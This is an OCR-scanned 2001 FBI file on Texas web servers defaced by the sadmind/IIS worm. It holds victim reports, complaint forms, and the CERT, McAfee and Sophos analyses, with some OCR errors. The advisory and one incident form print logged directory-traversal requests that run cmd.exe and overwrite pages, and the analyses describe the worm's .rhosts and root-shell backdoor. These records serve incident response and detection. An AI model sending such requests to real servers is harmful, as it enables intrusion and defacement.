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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date:05/22/2001 


To:VCounterterrorism Attn:  NIPC/CIOS/CIU 
Chicago SA 


From: Dallas 
NIPC 


Approved By: 


Drafted By: 


Case ID #: 
(Pending 


Title: unknown subject; 
sadmind/IIS Worm victims; 
Web Defacements; 
5/22/2001 


SUBMISSION: INITIAL 
CASE OPENED: 05/22/2001 


CASE CLOSED: 05/22/2001 
Closed administratively 


COORDINATION:  FBI Field Office - Dallas, Chicago 
Government Agency - 
Private Corporation - 


b3 


'b6 


b7C 
b7E 


b3 
b6 
b7C 
b7E 


"d 


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: American Hallmark Group/Hallmark Financial Services 


Address/location: 14651 Dallas Parkway #900 
Dallas, Texas 75240 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: Yes, firewall 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.hallmarkerp.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 202.107.11.78 (5/5/2001 at 4:00 am) 
CHINANET - China Telecom 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 


b3 
b7E 


b6 
b7C 


To: rism From: Dallas : 
Re: , Date 05/08/2001 


VICTIM 
Company name/Government ibl à xh Inc. = 
Address/location: 4144 North Central Expressway, suite 


Dallas, Texas 75204 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq (NT web server), Omni (Exchange mail server) 
Operating System: Windows NT 4.0 service pack 6A 
Software: IIS 4.0 


Security Features: 
Security Software Installed: Yes, Watchguard (hardware firewall), InoculateIT anti-virus 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.texastriathlon.com-victim 
IfInternet: Network name: www.northtexasviperclub.com -victim 
If Internet: Network name: www.hauk-i.com -victim 
If Internet: Network name: www.ljbb.com -victim 
If Internet: Network name: www.medica-inc.com -victim 
If Internet: Network name: www.mail.esinetwork.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: : 
address: 208.177.103.98, XO Communications, Georgia ISP 
address: 211.136.17.141, Net Plus, Hong Kong ISP 
address: 202.241.213.160, C-Live, Japanese ISP 
address: 133.38.151.20, Sai Tama University, Japan 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 2 
Estimated dollar loss to date: $9,500, 38 man-hours to repair 
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b3 
b7E 


b7C 


d a 
To: nterterrorism From: Dallas A 
Re: , Date 05/08/2001 b3 


b7E 


VICTIM 


Company name/Government agency: Global Knowledge 
b6 


Address/location: 1057 South Sherman Street bic 


Richardson, Texas 75081 


Purpose of System: web server for training organization 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Dell 8450 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.getglobalknowledge.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, only 15 minutes down, restored files from backup 


To: | Cou rism From: Dallas P 
Re: , Date 05/08/2001 


VICTIM 


Company name/Government oe MENT Consulting Engineers, Inc. 
Address/location: 2711 N. Haskell Ave. ityplace 
Dallas, Texas 75204 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No ] ( 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.schmidt-stacy.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses:unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 


b3 
b7E 


b7C 


To: | Counterterrorism From: Dallas : 


Re[ — ] , Date 05/08/2001 b3 
b7E 


VICTIM 


Company name/Government agency; The Pilcher's Grou | 
| | b6 
b7C 


Address/location: 7001 Preston Road, suite 200 
Dallas, Texas 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT, service pack 6.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.pilchers.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $150. for 6 man-hours to repair 


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Northwest a School ` 


Address/location: Denton, Texas 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.northwest.k12.tx.us - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: www.NJU.edu.cn/njue/profile/profile/president.htm 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $200, 8 man-hours to correct 


b3 
b7E 


b6 
b"7C 


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Perry Equipment Corporation 
Pao 25.2575] 


Address/location: Wolters Industrial Park 
Mineral Wells, Texas 76067 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): Compaq 
Operating System: Windows NT 4.0 ~ 
Software: IIS 4.0 


Security Features: 
Security Software Installed: No 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection ; 
If Internet: Network name: www.pecousa.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $125, 2 man-hours to repair 


b3 
b7E 


b7C 


To: Counterterrorism From: Dallas 
re:[  — o Date 05/08/2001 


VICTIM 


Company name/Government agency: Rockwall Controls T 


Address/location: 306 E. Washington 
Rockwall, Texas 75087 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 4.0 
Software: IIS 4.0 


Security Features: l 
Security Software Installed: Yes, ZoneAlarm 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.rockwallcontrols.com -victim 


i Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 202.103.134.218 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, 2 man-hours to repair 


b3 
b7E 


b6 
b7C 


To: ism From: Dallas è 
Re:, , Date 05/08/2001 


VICTIM 


Company name/Government agency} | individual, 


ei | 


Purpose of System: sells Herbalife 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Security Features: 
Security Software Installed: 
Logon Warning Banner: 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.EnergyTex.com - victim 
Network name: www.Reach4theSkve.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 
Estimated dollar loss to date: 


hohosts[ ^ Jsite, has not contacted with more information. 
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To: Counterterrorism From: Dallas e 
Re:[  —  — ] , Date 05/08/2001 b3 


b7E 
VICTIM 
Company name/Government agency: Harris, Finley & Bogle 
b6 
b7C 


. Address/location: 777 Main Street, suite 3600 
Fort Worth, Texas 76102-5341 


Purpose of System: proxy server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows NT 
Software: IIS 4.0 


Security Features: 
Security Software Installed: 
Logon Warning Banner: 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.hfblaw.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0 
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ReDD —— E] , Date 05/08/2001 b3 


To: Counterterrorism From: Dallas 


b7E 
VICTIM 
Company name/Government agency: DSX Access Systems 
| | b6 
Address/location: 10731 Rockwall b7C 


Dallas, Texas 75238 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Security Features: í 
Security Software Installed: Yes, firewall and packet filtering 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.dsxaccesssys.com - victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: unknown 


Impact: 
Compromise of classified information: 
Estimated number of computers affected: 1 
Estimated dollar loss to date: 
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b7E 


To: Counterterrorism From: Dallas 


VICTIM 


Company name/Government agency: Richmont 
b6 


Address/location: 17855 Dallas Parkway Rus 


Dallas, Texas 75240 


Purpose of System: web server 
Highest classification of information stored in system: non-classified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Windows 2000 
Software: IIS 5.0 


Security Features: 
Security Software Installed: Yes, firewall, IDS and packet filtering 
Logon Warning Banner: No 


INTRUSION INFORMATION 


Access for intrusion: Internet Connection 
If Internet: Network name: www.richmont.com -victim 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm 


Path of intrusion: 
addresses: 146.153.1.15 


Impact: 
Compromise of classified information: No 
Estimated number of computers affected: 1 
Estimated dollar loss to date: $0, 1 man-hour to correct problem 
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To: Counterterrorism From: Dallas D i 
Re: , Date 05/08/2001 b3 
b7E 


Category of Crime: 
Impairment: Theft of Information: 
[W Malicious code inserted O Classified information compromised 
O Denial of service O Unclassified information compromised 


[Y Destruction of information/software O Passwords obtained 


GY Modification of information/software C Computer processing time obtained 
CO Telephone services obtained 
[] Application software obtained 
O Operating software obtained 
Intrusion: 
GY Unauthorized access 
[] Exceeding authorized access 


REMARKS 


The victims listed above were attacked by the sadmind/IIS worm. All servers compromised had 
Windows OS installed running IIS. All victims were told to retain their logs for future analysis. 
According to the CERT Advisory CA-2001-11, a "victim" Solaris system has installed software to 
attack Microsoft IIS web servers. All victims were made aware of the advisory since many did 
not know they were infected by a worm. This information will be provided to case agent SA 
[D the Chicago Field Office for further review. OR 
Dollar value losses differ for each victim, due to the time it took to correct the problem. Many 

experienced administrators fixed the problem in short amount of time, while others spent days 

researching the intrusion. No victim reported losing customers due to the defacement. 


++ 
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Top Screen 


Protocol Attacks: 


L1 IP 


O TCP 


Li UDP 


O FTP 


O TFTP 


O Telnet 


O r commands 


L] SMTP 


L] HTTP 


O gopher 


O X11 window 


Menu 


Technology(s) Used: 


Secondary Screen 


OOOO 00 OO OO 


OOOOOOO nm OO 


OO 


spoofing attack 
source routing 


sequence number attack 


spoofing attack 
flooding 


vulnerable version 
SITE EXEC 
overload FTP buffer 
anonymous FTP 


highjacking 
packet sniffing 


rsh 
rlogin 


vulnerable version 
spoofing 

embedded postscript attack 
trojan horse attack 

syslog attack 

flooding 

MIME 


flooding 
Telnet to HTTP port 
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Top Screen Secondary Screen B 
O DNS O vulnerable version 
C flooding 
O SNMP 
O FSP 
O NFS 
Other Attacks: 
Y Worm 


O Social engineering 

O Scavenging and reusing 
O Masquerading 

O Scanning 

O Trojan Horse 


[] Other 
Other Description: 
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CERT® m CA-2001-11 sadmind/lIS 
Worm 


Original release date: May 08, 2001 
Last revised: May 08, 2001 
Source: CERT/CC 


A complete revision history is at the end of this file. 
Systems Affected 


e Systems running unpatched versions of Microsoft IIS 
e Systems running unpatched versions of Solaris up to, and including, Solaris 7 


Overview 
The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the 
sadmind/iiS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web 


pages. 


l. Description 


Based on preliminary analysis, the sadmind/liS worm exploits a vulnerability in Solaris systems and subsequently 
installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself 
automatically to other vulnerable Solaris systems. It will add "+ " to the .rhosts file in the root user's home 
directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems. 


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in 
the Solstice sadmind program. For more information on this vulnerability, see 


http://www.kb.cert.org/vuls/id/28934 
hitp://www.cert.org/advisories/CA-1999-16.html 


After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the 
IIS systems. For additional information about this vulnerability, see 


http://www.kb.cert.org/vuls/id/111677 


Solaris Systems that are successfully compromised via the worm exhibit the following characteristics: 


€ Sample syslog entry from compromised Solaris system 


02:40:01 carriex.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped 


May 7 
May 7 02:40:01 carriex.domain.com last message repeated 1 time 
May 7 02:40:03 carrier.domain.com last message repeated 1 time 
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped 
May 7 02:40:03 carrier.domain.com last message repeated 1 time 
May 7 02:40:06 caxrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault — core dumped 
May 7 02:40:08 caxrier.domain.com inetd[139): /usr/sbin/sadmind: Hangup 
May 7 02:40:08 carrier.domain.com last message repeated 1 time 
7 


May 02:44:14 carrier.domain.com inetd(139]: /usr/sbin/sadmind: Killed 


e Arootshell listening on TCP port 600 


Li 


http://www.cert.org/advisories/CA-2001-11.html 5/8/01 
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e Existence of the directories 
o /dev/cub contains logs of compromised machines pee dos 
o /dev/cuc contains tools that the worm uses to operate and propagate 


e Running processes of the scripts associated with the worm, such as the following: 
o /bin/sh /dev/cuc/sadmin.sh ` 
o /devi/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 
o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 
o /bin/sh /dev/cuc/uniattack.sh 
o /bin/sh /dev/cuc/time.sh 
o /usr/sbin/inetd -s /tmp/.f 
o /bin/sleep 300 


Microsoft IIS servers that are successfully compromised exhibit the following characteristics: 


e Modified web pages that read as follows: 


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcn8yahoo.com.cn 


e Sample Log from Attacked IIS Server 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c*dir 200 - 


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /ctdir+..\ 200 - 


2001- 705206 12:20:19 10.10.10.10 - 10.20.20.20 80 \ 
GET /scripts/../../winnt/system32/cmd.exe /c+copyt\winnt\system32\cmd.exetroot.exe 502 - 


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 X 
GET /scripts/root.exe /ctecho+<HTML code inserted here>.././index.asp 502 - 


Il. impact 


Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS 
systems. IIS um compromised by this worm can suffer modified web content. 


Intruders can use the vulnerabilities exploited by this worm to execute gibt code with root saiieads on 


vulnerable Solaris systems, and arbitrary commands with the privileges of the |USR_machinename account on 
vulnerable Windows systems. 


We are receiving reports of other activity, including one report of files being destroyed on the compromised 
Windows machine, rendering them UnbOotele. lt is unclear at this time if this activity is directly related to this 


worm. 


lll. Solutions 


Apply a patch from your vendor 
A patch is available from Microsoft at 
http:/Awww. microsoft.com/technet/security/bulletin/MS00-078.asp 


For IIS Version 4: 
http://www.microsoft.com/ntserver/nts/downloads/critica/q269862/default.asp 


For IIS Version 5: 


http://www.cert.org/advisories/CA-2001-11.html 5/8/01 
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hitp//www.microsoft.com/windows2000/downloads/critical/q269862/default. asp 
Additional advice on securing IIS web servers is available from 


http //www.microsoft.com/technet/security/iis5chk.asp 
http //www.microsoft.com/technet/security/tools.asp 


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: 


http://sunsolve.sun.com/pub-cgi/retrieve. pl? doctype=coll&doc=secbull/191 &type=0&nav=sec.sba 


Appendix A. Vendor Information 


Microsoft Corporation 


The following documents regarding this vulnerability are available from Microsoft: 
Sun Microsystems 
. Sun has issued the following bulletin for this vulnerability: 


http://sunsolve.sun.com/pub-cgi/retrieve.pl? doctype-coll&doc-secbull/191&type-0&nav-sec.sba 


References 


1. Vulnerability Note VUtH 11677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode 


in url (MS00-078) hittp://www.kb.cert.org/vuls/id/111677 
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind 


_ http://www.cert.org/advisories/CA-1999-16.html 


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, lan Finlay, John Shaffer 
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'"McAfee.com - Virus Informatio oray 


Virus Information Library Search Center 


Search for : Limit NS 
inni ith ^: search | B. 
Viruses beginning with ne ind it] > 


to: 


Keyword Search Advanced Search 


Virus Profile 


SunOS/BoxPoison.worm is a Low risk Internet Worm 

e McAfee.com Clinic Members, click Here to update ActiveShield. 
e Click Here to perform a VirusScan Online. 

e Click Here to download the latest dat files for (Retail) McAfee 
VirusScan. 


Virus Name 
SunOS/BoxPoison.worm 
Date Added 

5/10/01 11:01:42 AM 


Virus Characteristics 

This worm requires a unpatched version of Solaris (version 7 or lower) in 
order to spread. It uses the PERL/WSFT-Exploit trojan in order to attack 
unpatched Microsoft IIS Web Servers. It uses a buffer overflow exploit of the 
Sadmind program, a component of the Solstice AdminSuite. The worm 
opens port 600 and scans random IP addresses, looking for other systems 
to attack. 


For more information on this exploit, visit SUN Microsystems" website: SUN 
Security Bulletin 


Send This Virus Information To À Friend? 


Indications Of Infection 
- TCP port 600 being openned 
- Presence of the directories 


/dev/cub 
/dev/cuc 


- Once 2000 systems have been attacked, all INDEX.HTML files on the host 
system are overwriten to display the message: 


f@#! USA Government 
f@#! PoizonBOx 
(substitute text has been used here for demonstration purposes) 


Method Of Infection . 
Infected machines scan random IP addresses looking for other systems to 
infect. When one is found, a buffer overflow exploit is used to compromise 


that computer which then propagates the virus as well. 


http://vil.mcafee.com/dispVirus.asp?virus_k=99085& 
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', McAfee.com - Virus Informatio@prary 


Removal instructions 
Use specified engine and DAT files for detection and removal. Delete any 
file which contains this detection. 


Windows ME Info: 

NOTE: Windows ME utilizes a backup utility that backs up selected files 
automatically to the C:\_Restore folder. This means that an infected file 
could be stored there as a backup file, and VirusScan will be unable to 
delete these files. These instructions explain how to remove the infected 
files from the C:\-Restore folder. 


Disabling the Restore Utility 


. Right click the My Computer icon on the Desktop. 

. Click on the Performance Tab. 

Click on the File System button. 

. Click on the Troubleshooting Tab. 

. Puta check mark next to "Disable System Restore". 

. Click the Apply button. 

. Click the Close button. 

. Click the Close button again. 

9. You will be prompted to restart the computer. Click Yes. 

NOTE: The Restore Utility will now be disabled. 

10. Restart the computer in Safe Mode. 

11. Run a scan with VirusScan to delete all infected files, or browse the the 
file's located in the C:X Restore folder and remove the file's. 

12. After removing the desired files, restart the computer normally. 

NOTE: To re-enable the Restore Utility, follow steps 1-9 and on step 5 
remove the check mark next to "Disable System Restore". The infected file's 
are removed and the System Restore is once again active. 


DONDA NA 


Virus Information 
Discovery Date: 5/9/01 
Origin: Unknown 
Length: Varies 
Type: Internet Worm 
SubType: Remote Access 
Risk Low 


Aliases 
Backdoor.Sadmind (NAV), Sadmin- iis (Panda), Solaris/Sadmind.worm , 


Unix/Sadmind (Sophos) 


Send This Virus Information To A Friend? 


Virus Information Library Search Center 


Limit á £ ) 
Search for I 7 T E 
beginning with x: search | A 


to: 


Viruses 


Keyword Search Advanced Search 


POWERED BY 


http://vil.mcafee.com/dispVirus.asp?virus k-99085& . 
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s ' "Sophos virus analysis: Unix/Sa 


Name: 
Aliases: 


Type: 
Detection: 


Comments: 


Unix/SadMind 


sadmind/IIS, Solaris/Sadmind.worm, Backdoor.Sadmind, 
SunOS/BoxPoison 


Unix worm 


WIII be detected by Sophos Anti-Virus July 2001 (3.47) or 
later. A virus identity (IDE) file is available for earlier 
versions from the Latest virus identities section. 


At the time of writing Sophos has not seen any infections 
but has issued this alert due to media interest. 


Unix/Sadmind is an internet worm which propagates using 
a buffer overrun exploit on Solaris systems in the sadmind 
program, part of the Solstice AdminSuite. 


When the worm attacks a system it will append the text "+ 
+" to the .rhosts file belonging to root. It will then copy the 
worm (using rcp) to the new machine and extract into a 
new /dev/cuc directory. /etc/rc.d/S71rpc will be changed so 
the worm is started when the system is started and then 
that file will be run to make the worm active immediately. 


When the worm is active it will scan random class B 
networks looking for vulnerable machines to infect next. In 
parallel it will scan for Microsoft IIS web servers and will 
attempt to deface the front page with a message in red text 
on a black background stating 'fuck USA Government, fuck 
PoizonBOx. 


After the worm has infected 2000 other computers all 
index.html files on the infected machine will be changed to 


http://www.sophos.com/virusinfo/analyses/unixsadmind.html 


Home * Virus info * Virus analyses 


Page 1 of2 


5/16/01 


From: NIPC-WATCH 


To: 
Date: 5/8/01 1: 
Subject: Cyber Intrusion Report 050801 007 41482 


The following information was provided: 


Subject: Cyber Incident Report Form 


Date: Mon, 7 May 2001 18:55:06 -0400 
Pom sem — —— 3 
To: «nipc.watc 1.gov> 


Report_date_time=May 7, 2001 6:00 p.m. cst 
Name 

Title=Network Administra 
Telephone Fax Numbe 


Organization roup/Halimark Financial Service 
Addrs_Street=14651 Dallas Parkway #900 
City-Dallas 

State=Texas 

Zip Code=75240 

Country=USA 
Questioni_Organization=SAME 
Question1_Contact_Info 
Question1_Tele_Numbe 
Question1_Street=SAME 
Question1_City_State_Zipcd= 


Question1_Countw= 
a 
Question2_Location=Server is in the locked computer "room" located in the company suite (#900). It 


reguires code access to enter. 

Question3_Date_Time=05/05/2001 4:00 am - 5/6/2001 @ 8:00 pm 
Question4_Critical=Yes 

Quéstion5_crit_infrasture=Not Applicable 

Question5_Remarks=No Remarks 

Question6_nature_of_prob=Intrusion 

Question6_nature_of_prob=System impairment/denial resources 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 

Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 

Question8_method_of_attack=Vulnerability exploited 
Question8 method of attack-Other 

Question8 Remarks-lIt appears they came in through "port 80" and gained control of the cmd.exe to 
access the root directory. Then over wrote (or uploaded) their web pages over ours. 
Question9 sus perpetrators-Other 

Question9 sus perpetrators-Unknown 

Question9_Remarks=Due to text on page, appears to be a hack group attacking the USA Governnment 
and another group called PoizonBOx. It has a contact of: sysadmen@yahoo.com.cn 
Question10 ip addrs-202.107.11.78 

Question11 evid, of spoof-Unknown 

Question12 oper systems-NT 

Question12_Remarks=NT Vers 4. IIS ver.4 

Question13, security infrasturezIncident/Emergency Response Team 


b6 
b7C 


b6 
b7C 


Question13 security infrasture-Firewall 

Question14 attack loss info-Unknown 

Question14 Remarks-lt appears they only replaced our main page with theirs, but we don't know if they 
collected data off the system too. If they did, it is hundreds of customer's auto insurance & claims details 
Question15 damage. systms-No 

Question15 Remarks-So far, all data and system seem intact other than the web pages 
Question16 what, actions-System(s) disconnected from the network 
Question16 what, actions-Backup of affected system(s) 

Question16, what actions-Log files examined : 

Question16 Remarks-Programmer intends to "flag" the drive as read-only and company has backed up 
all log files for later reference and is considering not allowing the programmer to work remotely any more 
Question17. Field Office= 

Question17. fieldoff inform-No 

Question18 agency inform-No 

Question18, State local Police= 

Question18 Inspector General- 

Question18 CERT-CC- 

Question18_FedCIRC= 

Question18_JTF-CND= 

Question18_Other= 

Question19 date of last updalez YA 

Question19 org work upd e 

can get if needed 

Question20 POC Information- 

Question20 sys adm contractzNo 

Share Info With=Infrastructure Orgs 

Question21, remarks-Below is copy of a couple of lines from logfile: 


2001-05-05 04:32:42 202.107.117.8 GET /scripts/. /. /winnt/system32/cmd.exe 200 80 - - 
2001-05-05 04:32:42 202.107.117.8 GET /scripts/. /../winnt/system32/cmd.exe 502 80 - - 
2001-05-05 04:32:43 202.107.117.8 GET /scripts/root.exe 502 80 - - 


b6 
b7C 
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Hallmark Financial Services, Inc. primarily markets, underwrites and finances non-standard 
automobile insurance in the state of Texas. Secondarily the Company provides fee based 
claims adjusting, policy processing, cash management and related services for affiliates and 
third parties. These operations are carried out through its integrated insurance group known as 
the HALLMARK INSURANCE GROUP. 


Our Mission Is To: 


Provide fairly priced, quality products and services to our customers 
Offer rewarding opportunities to our team members and business partners 
“ge. Perform with integrity, teamwork and excellence. 


[Make Selection. >] 


Send mail to webmaster@hallmarkgrp.com with questions or comments about this web site. 
Copyright © 1999 Hallmark Financial Services 
Last modified: March 24, 2000 


http;//www.hallmarkgrp.com/ 5/21/01 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly, handwriting satisfactory for remainder. 
Indices: D Negative B See below 


Subject's name and aliases Character of case 


UNKNOWN i [ [computer Intrusion 


Complainant Protect Source 


Complaint received 


O Personal Telephonic Date 5/ 8/2001 Time 2:00 pm 


Address of Subject Complainant's address and telephone number 


Complainant's DOB 


Race [] Male Height Build Birth date and birth place 


g 
2 - - 
E t Ed EB bad a Social iiid Map 
ues 

29 

"| Scars, marks and other data 


Employer Address Telephone 
ESI 

Vehicle Description f i 

Facts of Complaint : 


Complainant claims his company's, ESI, website was intruded/hacked 
by Chinese individuals. Complainant has the log files associated with 
the intrusion. The company's operating system is Windows NT 4.0. The 
monetary loss due to manpower hours to replace the website is 
approximately $2,600.00. It was discovered on Monday morning but 
believed to have taken place on Friday evening. An analysis of their 
system was conducted. : 


Do not write in this space. 


(Complaint received by) È BLOCK STAMP 


b3 
b6 
b7C 
b7E 


b6 
b7c 


à 


LJBB Investment Group, LP © l e Page 1 of 1 


LJBB Investment Group, LP T" 


se [3 n S 
For information on DigitalConvergence.com, see here. acd Convergence 


| IBI Critical 
For information on Critical Devices, see here. TM 


For information on the Thermal Angel by Estill Medical Technologies, see 
nere. 


Questions? 


http://www.ljbb.com/ 5/21/01 


Texas Triathlon, Motorsport N x Driving Event @ Page 1 of 1 


TexasTriathlon.com 


The Texas Triathlon is 
an annual Motorsport 
Automobile Driving 
event held in the 
Dallas, TX area. It 

= © includes drag racing, 
road racing, and 
autocross. 2001 
event has already 
passed, and 2002 
event has NOT been 
scheduled yet. 


For our mailing list, calendar, etc., please join our YahooGroup 
below. 


Click to subscribe to texastriathlon 


29 


http://www.texastriathlon.com/ 5/21/01 


North Texas Viper Club e e Page 1 of 2 


North Texas Viper Club 


Includes a newsletter, calendar, pictures and technical information for the 
Dodge Viper. 


Hame M Calendar d Photos a Newsletter 
s 5o a a — up 777170077 up 77707 up 77777777 
Maintenance a Club Info A Feedback d Links 
Wp^ Weoo 


£ 
* 
a 
up 77777777 Up rrr 
r | 
` 


938Y8 FEILAR TIPLE RIEG 


fo order poster 
This is the new official website for the North Texas Viper Club. 


For current email threads, calendar, etc., join our YahooGroup by clicking Join Now". 


http://www.northtexasviperclub.com/ 5/21/01 


FD-71 (Rev. 3-27-95) 


Complaint F ir 2. 
a Complaint Form : C b ( 1@ 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 


Indices: LJ Negative LJ See below 


Subject's name and aliases Character of case 


b3 
Unknown 
b6 
b7C 
b7E 
Complainant [/] Protect Source 
Global Knowledge 
Complaint received 
C Persona! DÀ Telephonic Date 5/08/2001. Time 1:15 pm 
Address of Subject Complainant's address and telephone number 
1057 S. Sherman Street 
Richardson, Tx 75081 
Complainant's DOB Sex 
Male 
| Rae |[] Male [| Height | Hair | Build | Birth date and birth place 
e | | | 
g & Age | [C] Female X | Eyes | Complexion | Social Security Number 
25 
ES 
Q | Scars, marks and other data 
Employer Address Telephone 
Vehicle Description 
Facts of Complaint 
Complainant claims his company website, Global Knowledge, was 
intruded/hacked by unknown individuals. mm that he saved b6 
all the associated ioq files associated wi e intrusion. Financial b7C 


loss is undetermine stated that pr i inserted on some of 
the website pages. phone number is 


Forwarded to Securities Squad. 


Do not write in this space. 


P uu b6 


FUL TO As [fw b7C 


(Complaint received by) BLOCK STAMP 


-VAVO 7 OUP itt =- =u 
MOA: 


05/14/01 Male 


x 

UNSUB (S) Computer Fraud & Abuse - Impairment 
WCC-EC 
264A 


b6 
Global Knowledge 


x 900 
am 


1057 S. Sherman St, Richardson, TX 
214.576.0313 


C, of Global Knowledge, called to say that their company, 
who has their own ISP, has been targeted twice in the past week 
with intrusions of four files that damage their ISP. Their phone 
service for this ISP is Sprint. The last occurrence was on 
Friday, the 11th at 1249pm. The intruder dropped four files into 
their root directories causing various damage to their system, 
loss of files, etc. Global Knowledge is a training organization. 
This happened about a month ago and[ called the FBI, but no b6 
one called him back. b7C 


Lo- b6 
2) b7C 


Global Knowledge | Nortel Ww © Training | News Page | of 1 


Giobal Knowledge Nortel Networks Training 


; What's cLeaming? 
Real world classroom instruction, taught by industry professionals and 
delivered as hands-on, demonstration, and tutorial training -- -* 


Roadshow! 
> If your position requires knowledge of the Nortel Networks Meridian 1 
Communications System, then a Roadshow is the right course for you ---» 


; New eLearning Products 
What 's eLearning? 


à More people are turning to self-paced learning they can do on their own time, 
